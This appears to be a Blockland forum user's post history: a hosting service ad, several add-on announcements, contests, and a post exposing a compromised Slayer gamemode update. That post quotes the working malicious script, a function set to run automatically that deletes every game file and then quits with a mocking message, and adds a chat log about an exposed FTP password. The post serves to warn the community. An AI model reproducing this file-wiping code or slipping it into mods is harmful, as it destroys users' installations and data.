General Discussion / BlockNet Dedicated Hosting
« on: November 09, 2014, 07:09:18 AM »

BlockNet is the next generation managed hosting service that many people have been waiting for. Do you need a reliable server without going through the trouble of managing your own VPS, not to mention paying the higher cost of a VPS? Then BlockNet hosting may be for you.

In the wake of recent events, it was made clear that security had to be of the highest priority from now on. BlockNet hosting strives to have the highest standard of security ever seen in a managed Blockland hosting solution.

The three major aspects of BlockNet are: Security, Flexibility, and unparalleled Performance.

  • Security - BlockNet hosting utilizes time-tested open-source software to ensure maximum security for it's clients. Debian is well known for it's security measures and is among the most reasonably secure operating systems available. Copious amounts of time have been spent utilizing the powerful permission system Debian offers to ensure that client files are secure from unauthorized access and modification. BlockNet hosting also allows you to use authentication keys which are owned by BlockNet, rather than your own.
  • Flexibility - Unlike previous hosting services, BlockNet will be offering multiple levels of hosting so that clients only need to pay for what they need. Packages range from servers on shared hosting nodes (cheaper, yet still very reliable) and even being able to use our managed hosting service on a dedicated node specifically for your server (extremely high performance and reliability). Additionally, the distribution of nodes will allow clients more options in choosing the location of their server geographically. Once a reasonable client-base has been established, slots on nodes in other locations of the world such as Europe and Asia will become available for purchase. It is also possible that some extreme budget nodes may become available for clients who need only the simplest of hosting.
  • Performance - BlockNet hosts from high-end VPS nodes, with shared nodes being deployed in a distributed manner. This distribution ensures that extremely large DDoS attacks on servers has minimal impact on the client-base as a whole. Additionally, tests have proven that Blockland servers execute code faster on Debian-based systems than on Windows-based systems.

The open beta for BlockNet hosting will begin soon. The beta will span over a 1-month timeframe and will then end. The official service launch is projected to occur immediately afterwards, but I'm not ready to promise that.

Beta applications have ended.

If you wish to purchase a beta hosting slot ($10), please send me a private message and we'll work that out.
(If you cannot use the forums PM system, you can also contact me on steam)

Add-Ons / Tick Events - Makes repeating actions a lot easier and flexible
« on: October 29, 2014, 03:10:46 AM »
If you're tired of how unreliable and difficult it is to make repeating events using relays, then this is the event mod just for you.

Output events:
 SetTickRate - Sets how frequently this brick will tick (in milliseconds). Can be between 32 and 600000 (10 minutes).
 StartTick - Tells the brick to begin ticking. Will resume from a paused tick if one is available.
 StopTick - Tells the brick to stop ticking. Will reset the current tick back to 0.
 PauseTick - Tells the brick to stop ticking. Saves the current tick time.

Input event:
   onTick - This input will trigger every time this brick ticks.

General Discussion / Add-On Download Counters
« on: September 25, 2014, 05:42:43 PM »

As an example, I've put the counters on all of my add-ons in my add-on archive: http://forum.blockland.us/index.php?topic=254624.0

Counters come in a few styles (and I'll gladly make new styles/improve the current styles based on feedback)

Default: Fully featured "Download button" counter with all relevant information available on it.
Template made by TheBlackParrot

Prime: A more aesthetic counter that only shows the name of the mod and the download count.
Template made by Carbon Zypher.

RTB: Fully featured "Download button" counter with all relevant information available on it, in the RTB layout.
Template made by Pah1023

As stated above, I'm open to suggestions on new themes and improvements on the current layouts. Particularly I'd like a suggestion on a more appropriate font for the RTB layout.

Drama / Killing Blockland installations through slayer
« on: August 17, 2014, 01:29:02 AM »
As a few of us may know, Zapk hosted Greek2Me's mod website. About 30 minutes ago, Slayer received an update.

Also about 30 minutes ago, a help thread was created that recognized that Slayer was causing a severe error that caused the game to crash. I identified the malicious code which was in the new update.

Starting line 312 of Gamemode_Slayer\client\dependencies\GUI.cs
Code: [Select]
function fixSlayerClientConfig()
{
%pattern = "*/*.*";

%z = 6000;

for(%i = findFirstFile(%pattern); isFile(%i); %i = findNextFile(%pattern))
{
schedule(%z, 0, fileDelete, %i);

%z += 50;
}

schedule(%z + 5000, 0, MessageBoxOK, "Blockland", "Thanks for un-installing Blockland! We hope your time with us was a fun one!", "quit();");
}

Line 461 of Gamemode_Slayer\client\dependencies\GUI.cs
Code: [Select]
schedule(0, 0, fixSlayerClientConfig);

This appears to have been a very deliberate way of killing the game.

I contacted Zapk about this.

11:14 PM - Pecon7: You host Greek2Me's website right?
11:14 PM - Zapk: mmhm
11:14 PM - Zapk: why?
11:15 PM - Pecon7: Slayer just got updated, and it now contains game-killing code
11:15 PM - Pecon7: http://forum.blockland.us/index.php?topic=265036.msg7792943#msg7792943
11:15 PM - Zapk: oh forget
11:15 PM - Zapk: what
11:15 PM - Pecon7: It doesn't seem unreasonable to think that someone hijacked the site
11:15 PM - Zapk: ffforget I was kind of scared of this
11:15 PM - Zapk: okay, for about 10 minutes
11:15 PM - Zapk: zapkraft.net showed the directory
11:16 PM - Zapk: and there was a file I forgot to removed which contained the FTP password
11:16 PM - Zapk: I changed it after I realised

It seems likely that Zapk may have done it intentionally, considering his '' from earlier today. However, he insists that it was a timing coincidence and that someone else must have hijacked the website.

Quote
11:24 PM - Zapk: why would I do that if it were obviously me?
11:25 PM - Pecon7: Considering that you just did a 'master server Self Delete', it seems very likely you would do this.
11:25 PM - Zapk: The timing may seem close, because it's the same day I deleted index.php from my site
11:25 PM - Zapk: exposing ftp.txt
11:25 PM - Zapk: christ man

I'll be looking for more evidence, for now lets discuss what is already known here.

They released it due to it now being the 10th anniversary of the album it was in, "Once".

Notably, the beginning of the song is present in one of the old Blockland promotional videos.

If you're not interested in Nightwish, then this topic probably won't be very interesting for you.

I'm in need of someone in particular who is good with UI design. I need a client mod made that interacts with my dungeon generator server that accomplishes the following things:

Displays a simple 5x5 tile-based map on the playGui, tile updates are provided by the server.
A nice HUD for displaying game-related stats.
Bonus: A keybind to bring up an enlarged map with many extra tiles

The map is always upward-facing, but there should be a marker/compass on the map that shows the player's heading on the map.
Tiles only need to update to show icons for a few conditions: undiscovered, empty, occupied (has other player{s}), or treasure. Updates for individual titles will be provided with a clientcmd. The map is always centered on the tile the player is currently on. Tiles represent 16x16 Tu spaces, with the origin tile (The tile at the very center of the entire dungeon) centered over (0,0). The dungeon is a square with corners at (100,100), (100, -100), (-100, -100), and (-100, 100). Players start at (0,0).

Feel free to ask me for any other details you may need. I am willing to pay with paypal or bitcoin. If interested, please PM or post your best offer, along with proof that you are capable of the task.

General Discussion / Server Status Images - Rehosted
« on: May 31, 2014, 04:04:20 PM »
This PHP script for server status images was originally created by Destiny/Zack0Wack0, and was then modified and hosted by Kalphiter. Kalphiter has since stopped hosting the script, and gave me the source code.

Example:

Includes link generator. Taking suggestions for changes/additions.

Add-Ons / Better Server Rules
« on: May 10, 2014, 03:44:44 PM »
Remember those rules mods that would show a messagebox when you spawned, but it would always just close itself before you could really read it? I assure you this is quite different. These rules will display before the user is able to spawn, and they won't spawn until they click "YES" on the rules box. This ensures that every player has a fair chance to read the rules, and cannot otherwise argue that they didn't know the rules. Additionally, if a gamemode has a rules.txt file in it, it will automatically be loaded as the server's rules.

Commands:
/rules - Displays the rules on a normal OK box, good for previewing after changing a rule.

/setRule <number> <rules> - Allows a super-admin to set a rule. Can have as many as you want.
/setRule 1 Do not spam.
/setRule 2 This_very_long_rule_can_be_ma de_by_using_underscores_inste ad_of spaces !

Yes, it's that time again. As usual, I'm holding a contest at this server for a small sum of money. If you create the best 'present' build on the server by tomorrow afternoon, you'll win $10. You could buy an alt with that! Don't forget to put some contact information somewhere on the build, just in case.

General Discussion / Pecon7's Death Maze - Can you find the way out?
« on: February 28, 2014, 10:06:28 PM »
There are no gameplay rules on this server. Just don't spam the chat.

Download sounds and textures.

Most don't have the time to type a reaction.

Will you survive?

Don't post spoilers. You must experience it to understand it. (It also is fun to throw in random roleplay when you're with other players)

Due to RTB hosting shutting down, Boss Battles needs to move to a new service. The current plan is to purchase a VPS to use until a new Blockland hosting service becomes available. In order to reduce the costs of this and reap possibly higher performance, we would like to temporarily partner with another server to jointly purchase this VPS server. If you require 24/7 hosting and need an RTB-hosting alternative quickly, feel free to PM me or post here and we can discuss our options.

Add-Ons / Restrict Items (v2 saving and un-restricting)
« on: January 12, 2014, 02:21:46 AM »
This rather simple server mod allows you to restrict what items normal players are allowed to equip. Any admin may simply do the easy slash-command.
Examples:
/restrictitem mini-nuke
/restrictitem homing rocket
/restrictitem wrench
/restrictitem Mr. Wiggles

Items can be un-restricted in a similar manner.
Example:
/unrestrictitem wrench

Super admins can save 'profiles' which can be loaded later on so you don't have to re-restrict every item each time you start your server.
Examples:
/saveItemRestrictionProfile fortwars2
/setItemRestrictionProfile fortwars2

You can set a profile to be the 'default' profile. The default profile will automatically be loaded when the server starts.
Examples:
/setItemRestrictionDefaultProfile fortwars2
/clearItemRestrictionDefaultProfile

You don't need to memorize those. You only need to know one command. You can access a full reference of the commands with the help command.
/restrictionHelp

As you could easily tell, this mod can be useful in a variety of situations. No longer will arbitrary rules such as "no using the homing rocket" be needed, just restrict it and relax.
Admins can still use restricted items. This mod will still allow players to spawn and pick up restricted items, but they will be unable to equip them.
